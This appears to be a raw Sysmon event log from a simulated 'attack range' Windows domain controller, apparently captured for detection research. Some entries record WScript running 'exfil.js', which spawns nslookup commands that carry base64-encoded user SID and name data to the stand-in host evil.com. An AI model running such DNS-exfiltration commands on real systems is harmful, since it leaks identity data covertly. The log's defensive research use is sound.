14:21:42.824{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.824{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.824{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.824{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-3145-000000005F02}6492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.824{2E1864BB-18E0-629A-6742-000000005F02}39767212C:\Windows\System32\WScript.exe{2E1864BB-18F6-629A-3145-000000005F02}6492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.834{2E1864BB-18F6-629A-3145-000000005F02}6492C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlclb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.824{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfaqb.tmpMD5=EE0F2C575C28024B257C8FA561A930FF,SHA256=609D891407BB69D11081AC946B86D51A56F6BAC0645721CD4B5620AA4DCA480C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.793{2E1864BB-18F6-629A-2F45-000000005F02}77886020C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-3045-000000005F02}300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.793{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.793{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.793{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.793{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.793{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-3045-000000005F02}300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.793{2E1864BB-18F6-629A-2E45-000000005F02}72563596C:\Windows\system32\cmd.exe{2E1864BB-18F6-629A-3045-000000005F02}300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.796{2E1864BB-18F6-629A-3045-000000005F02}300C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F6-629A-2E45-000000005F02}7256C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfaqb.tmp 2>&1 10341000x8000000000000000212770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.770{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-2F45-000000005F02}7788C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.770{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-2F45-000000005F02}7788C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.770{2E1864BB-18F6-629A-2F45-000000005F02}77886020C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-2E45-000000005F02}7256C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.755{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2F45-000000005F02}7788C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.755{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.755{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.755{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.755{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.755{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-2E45-000000005F02}7256C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.755{2E1864BB-18E0-629A-6742-000000005F02}39767236C:\Windows\System32\WScript.exe{2E1864BB-18F6-629A-2E45-000000005F02}7256C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.760{2E1864BB-18F6-629A-2E45-000000005F02}7256C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfaqb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000212759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.338{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51034- 354300x8000000000000000212758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.338{00000000-0000-0000-0000-000000000000}8012<unknown process>-udptruefalse127.0.0.1-51034-false127.0.0.1-53domain 354300x8000000000000000212757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.338{00000000-0000-0000-0000-000000000000}8012<unknown process>-udpfalsefalse127.0.0.1-51033-false127.0.0.1-53domain 354300x8000000000000000212756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.337{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51033- 354300x8000000000000000212755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.337{00000000-0000-0000-0000-000000000000}8012<unknown process>-udptruefalse127.0.0.1-51033-false127.0.0.1-53domain 354300x8000000000000000212754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.337{00000000-0000-0000-0000-000000000000}8012<unknown process>-udpfalsefalse127.0.0.1-51032-false127.0.0.1-53domain 354300x8000000000000000212753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.337{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51032- 354300x8000000000000000212752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.276{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51031- 354300x8000000000000000212751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.276{00000000-0000-0000-0000-000000000000}6372<unknown process>-udptruefalse127.0.0.1-51031-false127.0.0.1-53domain 354300x8000000000000000212750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.276{00000000-0000-0000-0000-000000000000}6372<unknown process>-udpfalsefalse127.0.0.1-51030-false127.0.0.1-53domain 354300x8000000000000000212749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.276{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51030- 354300x8000000000000000212748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.275{00000000-0000-0000-0000-000000000000}6372<unknown process>-udptruefalse127.0.0.1-51030-false127.0.0.1-53domain 354300x8000000000000000212747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.275{00000000-0000-0000-0000-000000000000}6372<unknown process>-udpfalsefalse127.0.0.1-51029-false127.0.0.1-53domain 354300x8000000000000000212746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.275{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51029- 354300x8000000000000000212745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.275{00000000-0000-0000-0000-000000000000}6372<unknown process>-udptruefalse127.0.0.1-51029-false127.0.0.1-53domain 354300x8000000000000000212744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.199{00000000-0000-0000-0000-000000000000}5836<unknown process>-udpfalsefalse127.0.0.1-51028-false127.0.0.1-53domain 354300x8000000000000000212743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 